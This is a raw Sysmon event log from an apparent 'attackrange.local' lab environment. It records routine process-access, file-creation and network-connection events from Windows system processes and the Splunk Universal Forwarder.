08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810483Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810481Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810480Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:25.655{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.655{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.640{0C1E0330-F879-60EB-E579-00000000D001}3348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC718D2D2A2F3FDF0EF00B6D5A646B07,SHA256=711CF998E5DF88030A38E3B57DB28B2976716858D029F2F85D4E7D5A52A754D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A6304C86D5322FD207EFDECE9048403,SHA256=C7B91771A0F51506D2A355FFE84DF7A2894DCB87505AE95C0F7E88FF97ACA050,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.405{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BEAC0A9473D00E9F55DC0AACC1101EA8,SHA256=FB335687061CC4178894ACB78AD9E0FA9F01597F14E107C4A44EBBF29A1F8CF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810506Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:25.273{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57471-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810505Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.655{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FC718D2D2A2F3FDF0EF00B6D5A646B07,SHA256=711CF998E5DF88030A38E3B57DB28B2976716858D029F2F85D4E7D5A52A754D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.546{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C457CC3BFF8BEE60CCD0B8585195F5,SHA256=DE14FFD8D0DAC8FA215D771CBDA0C541D52FCFD64D60AEC4B3605DC160EA64B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:18.646{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61978-false10.0.1.12-8000- 23542300x80000000000000001054930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:26.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087508AC0FF4BF670814C271BCDAF843,SHA256=6E9D735FAC410F586C87CF30927715C3EB8FCD964C0BAE257D30CF317A84BF5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:08:26.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:26.343{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F87A-60EB-E679-00000000D001}1700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 